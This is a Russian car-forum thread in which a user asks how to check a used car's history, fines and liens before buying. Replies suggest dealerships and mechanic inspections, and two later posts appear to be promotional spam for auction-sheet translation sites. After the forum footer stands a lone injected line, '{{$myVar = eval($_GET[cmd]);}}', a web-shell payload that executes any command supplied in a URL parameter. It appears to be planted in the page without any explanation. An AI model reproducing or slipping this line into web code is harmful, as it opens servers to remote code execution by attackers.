+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Покупка авто


  1. #1
    Мимо проходил volter is on a distinguished road Аватар для volter
    Регистрация
    03.01.2019
    Откуда
    .
    Машина
    Временный пешеход
    Сообщений
    9

    Покупка авто

    Ребята, у меня возникла острая необходимость в покупке недорого, подержанного автомобиля для того чтобы решать определенные рабочие задачи в Москве. А самая главная проблема возникла в том, что толком не знаю, как перед приобретением проверить такой автомобиль на наличие проблем с законом, узнать его реальный пробег, есть ли штрафы на нем и залоги. Первым делом решил поискать решения данной проблемы в интернете и вот мне попался на глаза сайт Автокод, где предлагают узнать историю любого автомобиля по его государственному номеру https://avtocod.ru/ . Знать бы еще точно, что такой проверки достаточно в полном объеме перед покупкой машины. А что Вы мне скажите по всему этому поводу? Что дельное посоветуете?

  2. #2
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    Я бы вам посоветовал вообще покупать б\у авто только в официальных автосалонах, где перед продажей по идее все автомобили проверяют специалисты своего дела. Сам так лично и делал.

  3. #3
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    На мой взгляд, государственный номер автомобиля может рассказать практически всю его историю и это вполне эффективная проверка. При условии конечно, что сервис хороший и даст вам информацию в полном объеме.

  4. #4
    Мимо проходил tatarin is on a distinguished road Аватар для tatarin
    Регистрация
    22.12.2018
    Откуда
    .......
    Машина
    ......
    Сообщений
    14
    А я бы вам посоветовал обязательно показать б\у авто перед покупкой опытным автослесарям на каком-нибудь СТО. Для того чтобы они дали свою оценку техническому состоянию автомобиля.

  5. #5
    Новичок Leolton is on a distinguished road Аватар для Leolton
    Регистрация
    11.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    121
    Добрый вечер. Если у вас возникла необходимость перевести аукционный лист на русский язык, вы всегда можете воспользоваться услугой сервиса https://auctranslate.com/ . Стоимость перевода аукционного листа может быть увеличена в случае повышенной сложности. Это случается, как правило, с модифицированными автомобилями с большим количеством дополнительных опций.

  6. #6
    GTI-Racing iskander.bulatov96 is on a distinguished road Аватар для iskander.bulatov96
    Регистрация
    07.09.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    438
    Не всегда понятно, что там написано, какие будут авто, какая-то часть на японском, потому расшифровка аукционного листа более подробно расскажет про каждое авто. Какого года к примеру машина и какие есть поломки, аварии. Тут https://e-motorscorp.com/ все об этом есть, знаю как это важно многим покупателям

+ Ответить в теме

Похожие темы

  1. Покупка авто - советы.
    от Mongoose в разделе Golf 5
    Ответов: 16
    Последнее сообщение: 03.01.2024, 14:47
  2. Ответов: 1
    Последнее сообщение: 16.04.2011, 22:53
  3. Покупка авто
    от Romario в разделе Разное
    Ответов: 1
    Последнее сообщение: 27.10.2010, 11:14
  4. ПОКУПКА АВТО GOLF 6 - новая тема
    от Alexsik-a в разделе Отзывы / Выбор
    Ответов: 20
    Последнее сообщение: 28.05.2009, 14:26
  5. Покупка первого авто или...
    от skateb в разделе Отзывы / Выбор
    Ответов: 13
    Последнее сообщение: 09.04.2008, 22:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}